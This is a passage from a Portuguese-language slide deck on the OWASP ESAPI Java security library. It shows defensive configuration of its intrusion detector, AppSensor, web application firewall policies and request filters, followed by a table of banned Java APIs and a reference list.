    149 Configurando Intrusion Detector •Cada evento possui um parâmetro .count, .interval, e .action que são configurados no arquivo ESAPI.properties. • As ações são tomadas conforme um limiar de quantidade de eventos definida em "count" que ocorrem no intervalo de tempo definida em "interval" (em segundos) • Todas as exceções do tipo EnterpriseSecurityExceptions podem ser monitoradas • O IntrusionDetector é configurável para realizar automaticamente as seguintes ações: – log – apenas fazer log da requisição feita pelo usuario – logout – fazer logoff da conta do usuario que gerou a exceção – disable – bloquear a conta do usuario que gerou a exceção
  • 150.
    150 Configurando Intrusion Detector •É permitido definir múltiplas ações separadas por vírgulas ex: event.test.actions=log,disable • É permitido criar eventos e monitorá-los, para isto basta que o nomes dos eventos criados pelos usuários possuam o prefixo "IntrusionDetector.event.", da seguinte forma: • Para disparar o evento, basta realizar a chamada, associando o nome do evento definido: (...) # # Use IntrusionDetector.addEvent( "test" ) in your code to trigger "event.test" here IntrusionDetector.event.test.count=2 IntrusionDetector.event.test.interval=10 IntrusionDetector.event.test.actions=disable,log (...) ESAPI.intrusionDetector().addEvent( "test" );
  • 151.
    151 Configurando o IntrusionDetector (...) #=========================================================================== # ESAPI Intrusion Detection # IntrusionDetector.Disable=false # # Use IntrusionDetector.addEvent( "test" ) in your code to trigger "event.test" here IntrusionDetector.event.test.count=2 IntrusionDetector.event.test.interval=10 IntrusionDetector.event.test.actions=disable,log # Exception Events # any intrusion is an attack IntrusionDetector.org.owasp.esapi.errors.IntrusionException.count=1 IntrusionDetector.org.owasp.esapi.errors.IntrusionException.interval=1 IntrusionDetector.org.owasp.esapi.errors.IntrusionException.actions=log,disable,logout # sessions jumping between hosts indicates session hijacking IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.count=2 IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.interval=10 IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.actions=log,logout (...)
  • 152.
    152 OWASP AppSensor • Projetocomplementar da OWASP que possui uma implementação que substitui a implementação padrão de referência do IntrusionDetector da biblioteca ESAPI • Assim como o IntrusionDetector, o seu papel é monitorar as requisições e realizar ações pré-configuradas. Fonte: Michael Coates, AppSensor: Real Time Defenses, OWASP Foundation
  • 153.
    153 OWASP AppSensor • Contémum conjunto complementar de verificações previstas que não existiam, como: – Tentativas de modificar parâmetros POST para acessar objetos diretamente – Tentativa de Cross Site Scripting – Comando HTTP Inesperados – Tentativa de invocar método HTTP não suportado
  • 154.
    154 OWASP AppSensor • Pontosde detecção: – RequestException – AuthenticationException – SessionException – AccessControlException – InputException – EncodingException – CommandInjectionException – FileIOException – Honey Trap – UserTrendException – SystemTrendException – Reputation
  • 155.
    155 OWASP AppSensor • Contémum conjunto complementar de ações de resposta que não existem no DefaultIntrusionDetector, como: – disableComponent – bloqueia o acesso ao componente a todos os usuários que foi invocado para realizar a intrusão usando o AppSensorServiceController – disableComponentForUser – bloqueia o acesso ao componente que foi invocado para realizar a tentativa de intrusão apenas para o usuário logado (se existir) usando o AppSensorServiceController – emailAdmin – envia um Email para o administrador notificando qual ação maliciosa ocorreu – smsAdmin – envia um SMS para o administrador (via email para a conta sms) notificando qual ação maliciosa ocorreu
  • 156.
    156 Incorporando AppSensor (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.IntrusionDetector=org.owasp.appsensor.intrusiondetection.AppSensorIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) ESAPI.properties Configuração Original ESAPI.properties ConfiguraçãoModificada
  • 157.
    157 Incorporando AppSensor • Arquivode configuração (ESAPI.properties) exige mais parâmetros para configurar as novas ações. (...) #=========================================================================== #AppSensor IntrusionDetector.Total.count=10 IntrusionDetector.Total.interval=20 IntrusionDetector.Total.actions=log,logout,disable #no way to get this custom value via esapi IntrusionDetector.Total.custom=20 #http://www.owasp.org/index.php/AppSensor_DetectionPoints#ACE2:_Modifying_Parameters_Within_A_POST_For_Direct_Object _Access_Attempts IntrusionDetector.ACE2.count=3 IntrusionDetector.ACE2.interval=3 IntrusionDetector.ACE2.actions=log,logout,disable,disableComponent # some integer - duration of time to disable IntrusionDetector.ACE2.disableComponent.duration=30 # some measure of time, currently supported are s,m,h,d (second, minute, hour, day) IntrusionDetector.ACE2.disableComponent.timeScale=m # some integer - duration of time to disable IntrusionDetector.ACE2.disableComponentForUser.duration=30 # some measure of time, currently supported are s,m,h,d (second, minute, hour, day) IntrusionDetector.ACE2.disableComponentForUser.timeScale=m (...)
  • 158.
    158 Filtros ESAPI • AESAPI emprega filtros para realizar uma série de controles de segurança e ações úteis, incluindo autenticação e proteção contra ataques CSRF. • Filtros: –ESAPIFilter – Filtro da ESAPI que realiza algumas verificações básicas –WebApplicationFirewallFilter – Implementa a funcionalidade de firewall de aplicação –ESAPIRequestRateThrottleFilter – Restringe a quantidade de requisições por usuário
  • 159.
    159 Filtros ESAPI • Outrosfiltros: –GZIPFilter – Verifica se o browser suporta compressão com Gzip e usa a compressão dos dados de retorno com gzip –LoginFilter – Intercepta requisições de login para implementar a funcionalidade "Remember Me" –ClickjackFilter – Filtra quais páginas não podem receber frames internos, podendo ser configurado no web.xml com as seguintes opções: » DENY – Nenhum frame interno é permitido para as páginas filtradas, mesmo que sejam da própria aplicação » SAMEORIGIN – É permitido frames internos nas páginas filtradas que referenciam apenas as páginas internas da própria aplicação
  • 160.
    160 Filtros ESAPI • ConfigurandoClickJackFilter: – Modo DENY – Modo SAMEORIGIN <filter> <filter-name>ClickjackFilterDeny</filter-name> <filter-class>org.owasp.filters.ClickjackFilter</filter-class> <init-param> <param-name>mode</param-name> <param-value>DENY</param-value> </init-param> </filter> <filter> <filter-name>ClickjackFilterSameOrigin</filter-name> <filter-class>org.owasp.filters.ClickjackFilter</filter-class> <init-param> <param-name>mode</param-name> <param-value>SAMEORIGIN</param-value> </init-param> </filter>
  • 161.
    161 ESAPI Filter • Servecomo implementação de referência • Realiza verificação de controle de token CSRF na URL • Realiza verificação de autenticação do Usuário • Define flags para não fazer cache dos cabeçalhos ESAPI.authenticator().login(request, response); ESAPI.httpUtilities().checkCSRFToken(); ESAPI.httpUtilities().setNoCacheHeaders( response );
  • 162.
    162 ESAPI Filter • Realizalog (o array obfuscate contém uma lista de parametros que não devem ser registrado em log → password) • Realiza o controle de acesso às URLs • Faz a ligação com o request/response ESAPI.accessController().isAuthorizedForURL(request.getRequestURI()) ESAPI.httpUtilities().logHTTPRequest(request, logger, Arrays.asList(obfuscate)); ESAPI.httpUtilities().setCurrentHTTP(request, response);
  • 163.
    163 ESAPI WAF -Web Application Firewall • Configurado por arquivo de configuração policy.xml, onde é possível definir: –Virtual patches –Mecanismo que garante a autenticação –Mecanismo que garante o controle de acesso –Mecanismo que realiza a filtragem/detecção de saída de dados –Mecanismo que força o uso de HTTPS –entre outros...
  • 164.
    164 ESAPI WAF -Web Application Firewall Fonte: ESAPI documentation
  • 165.
    165 ESAPI WAF -Web Application Firewall • Esqueleto do arquivo policy.xml, onde é possível definir: –Aliases –Settings <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases></aliases> <settings></settings> </policy>
  • 166.
    166 ESAPI WAF -Web Application Firewall • Definindo aliases <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases> <alias name="ADMIN_PATH" type="regex">^/admin/.*</alias> </aliases> <settings></settings> </policy>
  • 167.
    167 ESAPI WAF -Web Application Firewall • Definindo ações: »redirect – redireciona para página de erro »block – pára o processamento e retorna uma página em branco »log – realiza o log da operação <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases></aliases> <settings> <mode>block</mode> <session-cookie-name>JSESSIONID</session-cookie-name> <error-handling> <default-redirect-page>/error.jsp</default-redirect-page> <block-status>500</block-status> </error-handling> </settings> </policy>
  • 168.
    168 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <virtual-patches> <virtual-patch id="1234" path="/foo.jsp" variable="request.parameters.bar" pattern="[0-9a-zA-Z]" message="Ataque xyz" /> </virtual-patches> </policy> • Algumas tags úteis: <virtual-patches … > – Criando virtual patches » São úteis para criar proteções urgentes que previnem contra ameaças recém descobertas e que a mudança em código é demorada ou está impossibilitada
  • 169.
    169 ESAPI WAF -Web Application Firewall • Algumas tags úteis: <restrict-source-ip … > – Restringindo os IPs que acessam determinado path <?xml version="1.0" encoding="UTF-8"?> <policy> <authorization-rules> <restrict-source-ip type="regex" ip-header="X-ORIGINAL-IP" Ip-regex="(192.168.1..*|127.0.0.1)" >/admin/.*</restrict-source-ip> </authorization-rules> </policy>
  • 170.
    170 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <authorization-rules> <must-match path="^/admin/.*" variable="session.org.acme.user.roles" operator="inList" value="admin" /> <must-match path="^/admin/.*" variable="request.headers.X-ROLES" operator="contains" value="admin" /> </authorization-rules> </policy> • Algumas tags úteis: <must-match … > – Exigindo determinado valor em variáveis de sessão/requisição (cabeçalho HTTP) equals exists inList contains
  • 171.
    171 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <restrict-extension deny=".java" /> <restrict-method deny="GET" path=".*.do$" /> <restrict-method allow="^(GET|POST|HEAD)$" /> </url-rules> </policy> • Algumas tags úteis: <restrict-extension … > e <restrict-method … > – Restringindo acesso a determinada extensão de arquivo – Restringindo ou autorizando métodos GET/POST/HEAD
  • 172.
    172 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <enforce-https path="/.*"> <path-exception>/index.html</path-exception> <path-exception type="regex">/images/.*</path-exception> <path-exception type="regex">/help/.*</path-exception> </enforce-https> </url-rules> </policy> • Algumas tags úteis: <enforce-https … > – Força o uso do HTTPs e permite definir páginas de exceção, onde o uso do HTTPs não é obrigatório URLs que são exceção à regra e não deve exigir HTTPs para elas
  • 173.
    173 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <header-rules> <restrict-user-agent deny=".*GoogleBot.*" /> <restrict-user-agent allow=".*" /> </header-rules> </url-rules> </policy> • Algumas tags úteis: <restrict-user-agent … > – Restringindo o client (user-agent) » No exemplo abaixo o bot do Google que realiza a busca e indexação dentro dos sites está sendo bloqueado
  • 174.
    174 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <add-secure-flag> <cookie name=".*"/> </add-secure-flag> </outbound-rules> </policy> • Algumas tags úteis: <add-secure-flag … > – Adicionando flag “secure-flag” nos cookies
  • 175.
    175 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <bean-shell-rules> <bean-shell-script id="example1" file="src/WAF/bean-shell-rule.bsh" stage="before-request-body"/> </bean-shell-rules> </outbound-rules> </policy> • Algumas tags úteis: <bean-shell-script … > – Executando scripts beanshell before-request-body after-request-body before-response
  • 176.
    176 ESAPI WAF -Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <bean-shell-rules> <bean-shell-script id="example1" file="src/WAF/bean-shell-rule.bsh" stage="before-request-body"/> </bean-shell-rules> </outbound-rules> </policy> • Algumas tags úteis: <bean-shell-script … > – Executando scripts em beanshell que podem executar operações pré-definidas import org.owasp.esapi.waf.actions.*; session.setAttribute("simple_waf_test", "true"); action = new RedirectAction(); BlockAction DefaultAction DoNothingAction RedirectAction
  • 177.
    177 ESAPI Request RateThrottle • É um filtro que limita a taxa de requisições para um certo limite de requisições por segundo • A taxa padrão é 5 hits a cada 10 segundos • A taxa pode ser redefinida ao adicionar parâmetros no arquivo web.xml com o nome "hits" e "period" com os valores desejados
  • 178.
    178 ESAPI Request RateThrottle <filter> <filter-name>RequestRateThrottleFilter</filter-name> <filter-class>org.owasp.esapi.filters.RequestRateThrottleFilter</filter-class> <init-param> <param-name>hits</param-name> <param-value>10</param-value> </init-param> <init-param> <param-name>period</param-name> <param-value>15</param-value> </init-param> </filter> <filter-mapping> <filter-name>RequestRateThrottleFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> • Configuração com a definição dos parâmetros hits e period no arquivo web.xml
  • 179.
    179 Vantagens do Usoda Biblioteca ESAPI  ESAPI x OWASP Top Ten
  • 180.
    180 Vantagens do Usoda Biblioteca ESAPI Programa de Segurança de Aplicações envolve: • Treinamento em Segurança de Aplicações • Ciclo de vida de desenvolvimento seguro • Guias e padrões de segurança em aplicações • Inventário e Métricas de segurança em aplicações Hipóteses • 1000 aplicações, muitas tecnologias, algumas terceirizadas • 300 desenvolvedores, 10 aulas de treinamento por ano • 50 novos projetos de aplicações por ano • Equipe de segurança de aplicações pequena  Potenciais redução de custos da empresa Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
  • 181.
    181 Vantagens do Usoda Biblioteca ESAPI  Estimativa de custos para tratar XSS Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
  • 182.
    182 Vantagens do Usoda Biblioteca ESAPI  Potencial de redução de custos da organização com a ESAPI Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
  • 183.
    183 Vantagens do Usoda Biblioteca ESAPI  Potencial de redução de custos da organização com a ESAPI Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
  • 184.
    184 Overview de APIsJava banidas Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs System.out.println() → Logger.* Throwable.printStackTrace() → Logger.* Runtime.exec() → Executor.safeExec() Reader.readLine() → Validator.safeReadLine() Session.getId() → Randomizer.getRandomString() (better not to use at all) ServletRequest.getUserPrincipal() → Authenticator.getCurrentUser() ServletRequest.isUserInRole() → AccessController.isAuthorized*() Session.invalidate() → Authenticator.logout() Math.Random.* → Randomizer.* File.createTempFile() → Randomizer.getRandomFilename() ServletResponse.setContentType() → HTTPUtilities.setContentType() ServletResponse.sendRedirect() → HTTPUtilities.sendSafeRedirect()
  • 185.
    185 Overview de APIsJava banidas Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs RequestDispatcher.forward() → HTTPUtilities.sendSafeForward() ServletResponse.addHeader() → HTTPUtilities.addSafeHeader() ServletResponse.addCookie() → HTTPUtilities.addSafeCookie() ServletRequest.isSecure() → HTTPUtilties.isSecureChannel() Properties.* → EncryptedProperties.* ServletContext.log() → Logger.* java.security and javax.crypto → Encryptor.* java.net.URLEncoder/Decoder → Encoder.encodeForURL/decodeForURL java.sql.Statement.execute → PreparedStatement.execute ServletResponse.encodeURL → HTTPUtilities.safeEncodeURL (better not to use at all) ServletResponse.encodeRedirectURL → HTTPUtilities.safeEncodeRedirectURL (better not to use at all)
  • 186.
  • 187.
    187 Conclusões Considerações Finais: • AESAPI auxilia no reuso e integração dos controles de segurança para desenvolver aplicações seguras, porém existe a necessidade de criar processos que vão além do código fonte da aplicação, envolvendo: – Análise de riscos de segurança de aplicações Web – Processo de codificação segura
  • 188.
    188 Conclusões Considerações Finais: • Arazão pela qual criamos princípios de segurança no desenvolvimento é ajudar os desenvolvedores a construírem aplicações seguras e não apenas para evitar as vulnerabilidades mais comuns atualmente. • Este provérbio resume esta ideia: “Ensinar o desenvolvedor a se prevenir contra uma determinada vulnerabilidade fará com que ele se previna dela. Ensiná-lo a desenvolver de forma segura fará com que ele se previna de muitas vulnerabilidades.”
  • 189.
    189 Referências DOM Based CrossSite Scripting or XSS of the Third Kind http://www.webappsec.org/projects/articles/071105.shtml http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API http://en.wikipedia.org/wiki/Canonicalization http://www.securityninja.co.uk/output-validation-using-the-owasp-esapi http://www.securityninja.co.uk/input-validation-using-the-owasp-esapi http://code.google.com/p/owasp-esapi-java/
  • 190.
  • 191.
    191 Referências Blogs: http://ha.ckers.org/blog (RSnake) http://shiflett.org (ChrisShiflett) http://jeremiahgrossman.blogspot.com http://www.gnucitizen.org (PDP) http://sylvanvonstuppe.blogspot.com http://www.memestreams.net/users/Acidus (Billy Hoffman) http://taosecurity.blogspot.com (Richard Bejtlich) http://www.dhanjani.com (Nitesh Dhanjani)
  • 192.
    192 Referências Vitor Afonso, AndréGrégio, Paulo Licio de Geus, Segurança Web: Técnicas para Programação Segura de Aplicações, AppSec Brasil, 2009. Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010 Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security OWASP Esapi for Java EE 2.0a, Web Application Firewall Policy File Specification, alpha, OWASP Foundation.
  • 193.
    193 Referências Michael Coates, OWASPAppSensor, V1.1, Detect and Respond to Attacks from within the Application, OWASP Foundation. Michael Coates, AppSensor: Real Time Defenses, OWASP Foundation http://www.owasp.org/index.php/OWASP_AppSensor_Project http://www.owasp.org/index.php/AppSensor_GettingStarted http://www.owasp.org/index.php/AppSensor_Developer_Guide http://www.beanshell.org/docs.html